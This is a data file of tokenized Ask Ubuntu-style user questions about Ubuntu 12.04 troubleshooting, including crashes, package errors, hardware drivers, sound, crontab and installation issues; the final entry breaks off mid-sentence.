162888	semi-reproducible crashes	i 've got ubuntu 12.04 lts . and i 'm new to ubuntu . i have problems with crashes that occur semi-randomly . sometimes when i start ubuntu , both browsers ( firefox and chrome ) fail to load . chrome gives “aw snap ! ” on every site and firefox exits giving an error . then i restart ubuntu and everything is normal . why does it fail to start when i start ubuntu for the first time ? sometimes i get “system program problem detected” . i even performed sudo rm /var/crash/* . it disappers on restart but it then comes back again . should i check if my all packages are properly installed ? how ?
162892	use ubunuone share instead of yousendit as thunderbird filelink	i think the title says it all . i have a 25gb u1 account and i like the option provided in thunderbird to upload large e-mail attachments to yousendit . is there a way to use u1 instead of yousendit ? i could obviously publish the file via u1 and copy the weblink into the mail body . but i 'd like to be able to have the step happen automatically when files exceed a certain size . having said this , i kind of expected to see u1 as an option in the thunderbird edit- > preferences- > attachments menu .
162897	can not mount sd-card after unmounting it	i have a sd-card reader on my laptop and i am currently working on my phone . so i need to transfer several times from / to my sd card . the problem is that , when i insert my sd-card in the reader , it gets automatically mounted and nautilus opens . so i transfer my files and then remove the card . after removing it , i just ca n't get it to mount again . i insert it and nothing opens . tried to mount via terminal , but just ca n't open it in nautilus again . after restart , it automatically opens like before but again just only one time . what can i do ? i have restarted my laptop about 15 times today .
162903	starting minecraft logs me out of ubuntu 12.04	whenever i start minecraft i can only get past the login screen . after that , the screen flashes dark , occasionally showing a checking battery state ... [ ok ] , and then it brings me to the login screen . i 've purged and re-installed java 7 , downloaded a new minecraft jar , and updated the game itself . i 'm not sure what i could do . any ideas ?
162904	matlab r2010b under ubuntu 12.04 - installation issue	so , i am trying to install matlab ( r2010b ) and i ca n't get the installer to appear . this is how far i get : ivana @ ivana-desktop : /usr/local/matlabr2010b $ sudo ./install -v -glnx86 preparing installation files ... - > dvd = /usr/local/matlabr2010b - > arch = glnx86 - > display = :0 - > testonly = 0 - > jre_loc = /tmp/mathworks_21291/java/jre/glnx86/jre - > ld_library_path = /usr/local/matlabr2010b/bin/glnx86 command to run : /tmp/mathworks_21291/java/jre/glnx86/jre/bin/java -djava.ext.dirs=/tmp/mathworks_21291/java/jre/glnx86/jre/lib/ext : /tmp/mathworks_21291/java/jar : /tmp/mathworks_21291/java/jarext -jar /tmp/mathworks_21291/java/jar/installwizard.jar -root /usr/local/matlabr2010b installing ... finished so everything looks very nice , except that after that nothing happens ! no installer pops up or whatsoever . i thought it might be somehow related to the problem similar to this one , but it does n't seem so : ivana @ ivana-desktop : /usr/local/matlabr2010b $ ls -l java/jre/glnx86/jre/bin/java -r-xr-xr-x 1 root root 47308 jan 27 2010 java/jre/glnx86/jre/bin/java some things i tried and did n't work : running gksu ./install and installing sun jdk 7 . i have n't seen anyone encountering the similar problem , so i would really appreciate any suggestion that would point out to what might be wrong .
162906	what is the difference between a `` / '' ( root ) and a /home partition at installation ?	i am making a 10g partition `` / '' ( root ) partition that will contain my ubuntu os and the rest of the drive will be the `` /home '' with the music , home , download , etc ... folders . ( that come originally ... .. ) do those general folders go directly on the /home partition ? i mean if i make a / and a /home partition ... .that means that one day when i wan na reinstall ubuntu , i 'll just need to do it on the / partition and all the data that is on /home ( in the download , home , music ... etc folders ) will stay there after the installation . am i right ?
162909	recommend place for google appengine launcher files to reside ?	there is no launcher for google appengine like you have on the windows environs . however there is a workaround . problem is i copied everything to my ~/downloads/google-appengine-launcher folder . it worked okay . in the shell i just cd to the above path and do ./googleappenginelauncher.py ; it works ! ! but since that being a user specific folder i moved it to another generic location : /usr/share/apps , and i added a symbolic link to the above script as follows : ln -s /usr/share/apps/google-appengine-launcher/googleappenginelauncher.py /usr/bin/google-appengine-launcher now i do alt+f2 to bring the run dialog , and type in google-appengine-launcher , appengine application windows loads , but there is an error message saying it ca n't load icons ... why is this so ? how to fix this ?
162910	corel painter on wine	i have a copy of corel painter left over from my windows/mac days and wonder if anyone can attest to using painter under wine ? i just had a look at mypaint and will install it regardless , but i 'm really used to painter ( interface , workflow , etc . ) thanks .
162915	usefullness of multi-threading for ubuntu	i 'm looking for a new laptop , one on which i am able to install ( and multi-boot ) ubuntu . some laptops offer processors with multi-threading , but i 'm wondering whether it makes any sense to have such a core : does ubuntu os support it , and are there ( m ) any apps that support it ? thanks in advance !
162918	first time install : ubuntu is incredibly slow .	i just installed ubuntu , and i must admit , i have no idea what i 'm doing in linux . i installed it on my old lenovo t60 , and i was surprised at how slow it runs . it 's a lot slower than my 2 year old winxp install . any tips ? just to illustrate how fresh i am , i do n't even know how to get root in the terminal .
162921	ubuntu starts only when i boot from my flash drive	i have installed the ubuntu 12.04 using a bootable usb . the installation went fine but after the installation there was just a blank screen with the cursor blinking and ubuntu was n't starting . maybe that was an installation error but when i booted again from my usb surprisingly ubuntu started working . even if i remove the usb after the initial boot , ubuntu keeps working fine . do i have to boot from my usb each time i restart my computer ?
162924	.xsession-errors huge file	my ~/.xsession-errors file is growing quickly . the following error is repeated over and over : ( nautilus:1595 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed
162931	unity spontaneously logs out in ubuntu 12.04	this started happening after i upgraded from 11.10 . i 'm running on a latitude 13 laptop with an intel mobile 4 series chipset integrated graphics controller ( not nvidia ) - no proprietary drivers . it seems to happen under load , though i ca n't tell if the load is caused by something with this problem or by a program i 'm running . i 'd like to try nailing this problem . ideally i do n't want to switch to something else ( at least not before knowing that that 's the only way out and that it 's specific to unity and not , say , x ) .
162933	how to set pre-installed applications in an ubuntu installation ?	is there a way to have an installation of ubuntu with all the usual programs or pre-defined ones ? eg : blender , gimp , vlc , firezila i 'm having to install ubuntu a few times and id like a preset install .
162955	11.10 to 12.04 : update manager ca n't find 12.04	i 've got 11.10 and have fully updated it but the option to upgrade to 12.04 just is n't coming up . i even tried to update via terminal . do i have to change something ? ( i 'm fairly new to ubuntu/linux )
162960	keyboard backlight support for asus g55vw	the fn+f3 and fn+f4 key combinations are not able to control the keyboard backlight on my asus g55vw . i could live with a command line solution so i tried the solution proposed here : http : //askubuntu.com/a/157986/71053 unfortunately , there is no /sys/class/leds/asus : :kbd_backlight device but i instead found one named /sys/class/leds/ath9k-phy0 . i have tried echoing values to it : no error occurs , the value is changed , but the keyboard remains dark . any suggestion welcome .
162962	e : sub-process /usr/bin/dpkg returned an error code ( 1 ) seems to be choking on kde-runtime-data version issue	12.04 lts , on a dell mini 10 . install stable until about a week ago . updated about 1x a week , sometimes more often . several days ago , i booted up and the system was no longer working correctly . all these symptoms occurred simultaneously : can not run ( exit on opening , every time ) : update manager , software center , ubuntuone , libreoffice . vinagre autostarts on boot , no explanation , not set to startup with ubuntu . using apt-get to fix install results in the following : maura @ pandora : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following package was automatically installed and is no longer required : libtelepathy-farstream2 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : gwibber gwibber-service kde-runtime-data software-center suggested packages : gwibber-service-flickr gwibber-service-digg gwibber-service-statusnet gwibber-service-foursquare gwibber-service-friendfeed gwibber-service-pingfm gwibber-service-qaiku unity-lens-gwibber the following packages will be upgraded : gwibber gwibber-service kde-runtime-data software-center 4 upgraded , 0 newly installed , 0 to remove and 39 not upgraded . 20 not fully installed or removed . need to get 0 b/5,682 kb of archives . after this operation , 177 kb of additional disk space will be used . do you want to continue [ y/n ] ? debconf : perl may be unconfigured ( ca n't locate scalar/util.pm in @ inc ( @ inc contains : /etc/perl /usr/local/lib/perl/5.14.2 /usr/local/share/perl/5.14.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.14 /usr/share/perl/5.14 /usr/local/lib/site_perl . ) at /usr/lib/perl/5.14/hash/util.pm line 9 . begin failed -- compilation aborted at /usr/lib/perl/5.14/hash/util.pm line 9 . compilation failed in require at /usr/share/perl/5.14/fields.pm line 122 . compilation failed in require at /usr/share/perl5/debconf/log.pm line 10 . compilation failed in require at ( eval 1 ) line 4 . begin failed -- compilation aborted at ( eval 1 ) line 4. ) -- aborting ( reading database ... 242672 files and directories currently installed . ) preparing to replace gwibber 3.4.1-0ubuntu1 ( using ... /gwibber_3.4.2-0ubuntu1_i386.deb ) ... could not find platform dependent libraries < exec_prefix > consider setting $ pythonhome to < prefix > [ : < exec_prefix > ] traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 1 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 16 , in < module > from xml.parsers.expat import expaterror file `` /usr/lib/python2.7/xml/parsers/expat.py '' , line 4 , in < module > from pyexpat import * importerror : no module named pyexpat original exception was : traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg - trying script from the new package instead ... could not find platform dependent libraries < exec_prefix > consider setting $ pythonhome to < prefix > [ : < exec_prefix > ] traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 1 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 16 , in < module > from xml.parsers.expat import expaterror file `` /usr/lib/python2.7/xml/parsers/expat.py '' , line 4 , in < module > from pyexpat import * importerror : no module named pyexpat original exception was : traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging dpkg : error processing /var/cache/apt/archives/gwibber_3.4.2-0ubuntu1_i386.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 could not find platform dependent libraries < exec_prefix > consider setting $ pythonhome to < prefix > [ : < exec_prefix > ] traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 27 , in < module > import logging importerror : no module named logging error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 1 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 16 , in < module > from xml.parsers.expat import expaterror file `` /usr/lib/python2.7/xml/parsers/expat.py '' , line 4 , in < module > from pyexpat import * importerror : no module named pyexpat original exception was : traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 27 , in < module > import logging importerror : no module named logging dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 preparing to replace gwibber-service 3.4.1-0ubuntu1 ( using ... /gwibber-service_3.4.2-0ubuntu1_all.deb ) ... could not find platform dependent libraries < exec_prefix > consider setting $ pythonhome to < prefix > [ : < exec_prefix > ] traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 1 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 16 , in < module > from xml.parsers.expat import expaterror file `` /usr/lib/python2.7/xml/parsers/expat.py '' , line 4 , in < module > from pyexpat import * importerror : no module named pyexpat original exception was : traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg - trying script from the new package instead ... could not find platform dependent libraries < exec_prefix > consider setting $ pythonhome to < prefix > [ : < exec_prefix > ] traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 1 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 16 , in < module > from xml.parsers.expat import expaterror file `` /usr/lib/python2.7/xml/parsers/expat.py '' , line 4 , in < module > from pyexpat import * importerror : no module named pyexpat original exception was : traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging dpkg : error processing /var/cache/apt/archives/gwibber-service_3.4.2-0ubuntu1_all.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 could not find platform dependent libraries < exec_prefix > consider setting $ pythonhome to < prefix > [ : < exec_prefix > ] traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 27 , in < module > import logging importerror : no module named logging error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 1 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 16 , in < module > from xml.parsers.expat import expaterror file `` /usr/lib/python2.7/xml/parsers/expat.py '' , line 4 , in < module > from pyexpat import * importerror : no module named pyexpat original exception was : traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 27 , in < module > import logging importerror : no module named logging dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 preparing to replace kde-runtime-data 4:4.8.3-0ubuntu0.1 ( using ... /kde-runtime-data_4 % 3a4.8.4-0ubuntu0.1_all.deb ) ... unpacking replacement kde-runtime-data ... dpkg : error processing /var/cache/apt/archives/kde-runtime-data_4 % 3a4.8.4-0ubuntu0.1_all.deb ( -- unpack ) : trying to overwrite '/usr/share/sounds ' , which is also in package sound-theme-freedesktop 0.7.pristine-2 dpkg-deb ( subprocess ) : subprocess data was killed by signal ( broken pipe ) dpkg-deb : error : subprocess < decompress > returned error exit status 2 preparing to replace python-crypto 2.4.1-1 ( using ... /python-crypto_2.4.1-1_i386.deb ) ... could not find platform dependent libraries < exec_prefix > consider setting $ pythonhome to < prefix > [ : < exec_prefix > ] traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 1 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 16 , in < module > from xml.parsers.expat import expaterror file `` /usr/lib/python2.7/xml/parsers/expat.py '' , line 4 , in < module > from pyexpat import * importerror : no module named pyexpat original exception was : traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg - trying script from the new package instead ... could not find platform dependent libraries < exec_prefix > consider setting $ pythonhome to < prefix > [ : < exec_prefix > ] traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 1 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 16 , in < module > from xml.parsers.expat import expaterror file `` /usr/lib/python2.7/xml/parsers/expat.py '' , line 4 , in < module > from pyexpat import * importerror : no module named pyexpat original exception was : traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging dpkg : error processing /var/cache/apt/archives/python-crypto_2.4.1-1_i386.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 no apport report written because maxreports is reached already could not find platform dependent libraries < exec_prefix > consider setting $ pythonhome to < prefix > [ : < exec_prefix > ] traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 27 , in < module > import logging importerror : no module named logging error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 1 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 16 , in < module > from xml.parsers.expat import expaterror file `` /usr/lib/python2.7/xml/parsers/expat.py '' , line 4 , in < module > from pyexpat import * importerror : no module named pyexpat original exception was : traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 27 , in < module > import logging importerror : no module named logging dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 preparing to replace software-center 5.2.2.2 ( using ... /software-center_5.2.4_all.deb ) ... could not find platform dependent libraries < exec_prefix > consider setting $ pythonhome to < prefix > [ : < exec_prefix > ] traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 1 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 16 , in < module > from xml.parsers.expat import expaterror file `` /usr/lib/python2.7/xml/parsers/expat.py '' , line 4 , in < module > from pyexpat import * importerror : no module named pyexpat original exception was : traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg - trying script from the new package instead ... could not find platform dependent libraries < exec_prefix > consider setting $ pythonhome to < prefix > [ : < exec_prefix > ] traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 1 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 16 , in < module > from xml.parsers.expat import expaterror file `` /usr/lib/python2.7/xml/parsers/expat.py '' , line 4 , in < module > from pyexpat import * importerror : no module named pyexpat original exception was : traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging dpkg : error processing /var/cache/apt/archives/software-center_5.2.4_all.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 no apport report written because maxreports is reached already could not find platform dependent libraries < exec_prefix > consider setting $ pythonhome to < prefix > [ : < exec_prefix > ] traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 27 , in < module > import logging importerror : no module named logging error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 1 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 16 , in < module > from xml.parsers.expat import expaterror file `` /usr/lib/python2.7/xml/parsers/expat.py '' , line 4 , in < module > from pyexpat import * importerror : no module named pyexpat original exception was : traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 27 , in < module > import logging importerror : no module named logging dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 preparing to replace xdiagnose 2.5 ( using ... /archives/xdiagnose_2.5_all.deb ) ... could not find platform dependent libraries < exec_prefix > consider setting $ pythonhome to < prefix > [ : < exec_prefix > ] traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 1 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 16 , in < module > from xml.parsers.expat import expaterror file `` /usr/lib/python2.7/xml/parsers/expat.py '' , line 4 , in < module > from pyexpat import * importerror : no module named pyexpat original exception was : traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg - trying script from the new package instead ... could not find platform dependent libraries < exec_prefix > consider setting $ pythonhome to < prefix > [ : < exec_prefix > ] traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 1 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 16 , in < module > from xml.parsers.expat import expaterror file `` /usr/lib/python2.7/xml/parsers/expat.py '' , line 4 , in < module > from pyexpat import * importerror : no module named pyexpat original exception was : traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 25 , in < module > import logging importerror : no module named logging dpkg : error processing /var/cache/apt/archives/xdiagnose_2.5_all.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 no apport report written because maxreports is reached already could not find platform dependent libraries < exec_prefix > consider setting $ pythonhome to < prefix > [ : < exec_prefix > ] traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 27 , in < module > import logging importerror : no module named logging error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 1 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 16 , in < module > from xml.parsers.expat import expaterror file `` /usr/lib/python2.7/xml/parsers/expat.py '' , line 4 , in < module > from pyexpat import * importerror : no module named pyexpat original exception was : traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 27 , in < module > import logging importerror : no module named logging dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/gwibber_3.4.2-0ubuntu1_i386.deb /var/cache/apt/archives/gwibber-service_3.4.2-0ubuntu1_all.deb /var/cache/apt/archives/kde-runtime-data_4 % 3a4.8.4-0ubuntu0.1_all.deb /var/cache/apt/archives/python-crypto_2.4.1-1_i386.deb /var/cache/apt/archives/software-center_5.2.4_all.deb /var/cache/apt/archives/xdiagnose_2.5_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) maura @ pandora : ~ $ ^c maura @ pandora : ~ $
162965	how do i install all development libraries ?	i want to preinstall all the libraries one could ever need onto a system so someone building something would always have the libraries available . like in a computer lab where users are not root . i want to do something like apt-get install lib* but i do n't think that will be a good idea . is there a package like most-libs-used ?
162966	how do i configure the gmail notifier ?	i changed my gmail password and since then my gm-notify does n't work , even after reinstalling . i ca n't find anywhere to manage my gm-notify account . how to fix it ?
162976	how do i bundle a package and its dependencies into a single deb file ?	i have copied downloaded deb package when installing software from software center or terminal . is it possible to make a single package instead of multiple package . exp : thunder bird have 3 package when i download it . now i want to make standalone package .
162984	logitech g700 mouse scrollwheel is way too sensitive , how can i configure it ?	i am trying to migrate my brother to use ubuntu . however , his logitech g700 mouse 's scroll wheel is extremely sensitive . by sensitive , i mean that , due to the fact that it uses high-resolution scrolling , every minor nudge is interpreted as a scroll attempt . i have no way to configure this in ubuntu - i want the os to ignore every few events from the mouse scroll wheel to make it work properly . xev in a terminal is going crazy whenever i even lay a finger on the scroll wheel . how can i fix this issue ?
162989	sound became distorted	good morning . today i was playing with sunvox and ( probably after that ) sound became quite or very distorted in many applications . thanks . add : if necessarily : ben @ pav : ~ $ sudo alsa reload [ sudo ] password for ben : /sbin/alsa : warning : processes using sound devices : 2175 ( pulseaudio ) . unloading alsa sound driver modules : snd-hrtimer snd-hda-codec-conexant snd-hda-intel snd-hda-codec snd-hwdep snd-pcm snd-page-alloc snd-seq-midi snd-rawmidi snd-seq-midi-event snd-seq snd-timer snd-seq-device ( failed : modules still loaded : snd-hrtimer snd-hda-codec-conexant snd-hda-intel snd-hda-codec snd-hwdep snd-pcm snd-page-alloc snd-seq snd-timer snd-seq-device ) . loading alsa sound driver modules : snd-hrtimer snd-hda-codec-conexant snd-hda-intel snd-hda-codec snd-hwdep snd-pcm snd-page-alloc snd-seq-midi snd-rawmidi snd-seq-midi-event snd-seq snd-timer snd-seq-device . sound was moved to the medium level in alsamixer . after killing pulseaudio i got no sound at all . some additional info : ben @ pav : ~ $ lsb_release -d description : ubuntu 12.04 lts ben @ pav : ~ $ uname -r 3.2.0-23-generic ben @ pav : ~ $ cat /proc/asound/cards 0 [ nvidia ] : hda-intel - hda nvidia hda nvidia at 0xf2480000 irq 21 ben @ pav : ~ $ aplay -l **** список playback устройств **** карта 0 : nvidia [ hda nvidia ] , устройство 0 : conexant analog [ conexant analog ] подустройства : 1/1 подустройство №0 : subdevice # 0 карта 0 : nvidia [ hda nvidia ] , устройство 1 : conexant digital [ conexant digital ] подустройства : 1/1 подустройство №0 : subdevice # 0 ben @ pav : ~ $ aplay /usr/share/sounds/alsa/noise.wav воспроизведение wave '/usr/share/sounds/alsa/noise.wav ' : signed 16 bit little endian , частота 48000 гц , моно ben @ pav : ~ $ lspci -nnk | grep -ia2 audio 00:07.0 audio device [ 0403 ] : nvidia corporation mcp65 high definition audio [ 10de:044a ] ( rev a1 ) subsystem : hewlett-packard company device [ 103c:30cf ] kernel driver in use : snd_hda_intel doing sudo apt-get purge pulseaudio gstreamer0.10-pulseaudio sudo apt-get install alsa-utils gstreamer0.10-x gave nothing.in gstreamer-properties i can see no output devices there and in sound menu element .
162994	why do i get a blank screen when starting wubi ?	i used wubi to download 12.04 on a new partition . when restarting , the computer ( levono windows 7 -64 ) froze with no signal on my screen . turning the computer on and off i received the option to sign in on windows or ubuntu . windows worked well , but ubuntu seems to bomb again as before . i can look at the new partition where some ubuntu files exist via windows explorer . what am i to do ? is 12.04 compatible with windows 7 ?
163002	is virtualization in windows less battery intensive than wubi ? than a disk install ?	i read that running ubuntu through a virtual machine such as vmware player or virtualbox is actually less costly on a laptop 's battery than wubi because it utilizes windows ' drivers , which are optimized for windows by the hardware manufacturers , as opposed to the linux drivers , which are less optimized and thus more costly for your system . is this true for wubi ? if so , is it also true for a `` normal '' live cd/usb installation ?
163009	telnet output file does not work correctly under crontab	i 'm using the ubuntu 10.04.4lts , and have ganglia installed in my computer . i used to get the gmetad data by typing : telnet localhost 8651 > /test/test.txt or made a .sh file to run it . after this i want to get gmetad data periodically . i try crontab . after some simple test i am sure that the crontab works in my ubuntu . however , when i try to make crontab get the data by setting like this : */5 * * * * root sudo telnet localhost 8651 > /test/test.txt the output file will be incomplete , for example : 3263 2012-07-13 09:28 fromcrontab.txt 44833 2012-07-13 08:14 correctone.txt the correctone.txt file contain 44833 chars , but the output file from crontab contains only 3263 chars . i 've tried to solve this by using tee : sudo telnet localhost 8651 | tee -i /test/test.txt or change the shell : shell=/bin/sh or shell=/bin/bash neither one could help . i 'm new to ubuntu and not i 'm not familiar with crontab or telnet . hoping someone could help me solve this problem or give me some direction for studying . thanks .
163013	nvidia - the edid for cndlcd ( dfp-1 ) contradicts itself	i keep getting the following error on my xorg.log file which causes my tv monitor to not be able to get 1920x1080 and other smaller resolutions : [ 26.967 ] ( ww ) nvidia ( gpu-0 ) : the edid for cndlcd ( dfp-1 ) contradicts itself : mode `` 720x576 '' [ 26.967 ] ( ww ) nvidia ( gpu-0 ) : is specified in the edid ; however , the edid 's valid [ 26.967 ] ( ww ) nvidia ( gpu-0 ) : horizsync range ( 30.000-95.000 khz ) would exclude this [ 26.967 ] ( ww ) nvidia ( gpu-0 ) : mode 's horizsync ( 15.6 khz ) ; ignoring horizsync check for [ 26.967 ] ( ww ) nvidia ( gpu-0 ) : mode `` 720x576 '' . [ 26.967 ] ( ww ) nvidia ( gpu-0 ) : the edid for cndlcd ( dfp-1 ) contradicts itself : mode `` 720x576 '' [ 26.967 ] ( ww ) nvidia ( gpu-0 ) : is specified in the edid ; however , the edid 's valid [ 26.967 ] ( ww ) nvidia ( gpu-0 ) : vertrefresh range ( 60.000-75.000 hz ) would exclude this [ 26.967 ] ( ww ) nvidia ( gpu-0 ) : mode 's vertrefresh ( 50.0 hz ) ; ignoring vertrefresh check [ 26.967 ] ( ww ) nvidia ( gpu-0 ) : for mode `` 720x576 '' . [ 26.967 ] ( ww ) nvidia ( gpu-0 ) : the edid for cndlcd ( dfp-1 ) contradicts itself : mode [ 26.967 ] ( ww ) nvidia ( gpu-0 ) : `` 1920x1080 '' is specified in the edid ; however , the edid's [ 26.967 ] ( ww ) nvidia ( gpu-0 ) : valid vertrefresh range ( 60.000-75.000 hz ) would exclude [ 26.967 ] ( ww ) nvidia ( gpu-0 ) : this mode 's vertrefresh ( 50.0 hz ) ; ignoring vertrefresh [ 26.967 ] ( ww ) nvidia ( gpu-0 ) : check for mode `` 1920x1080 '' . how can i solve this . i have the proprietary drivers from the nvidia 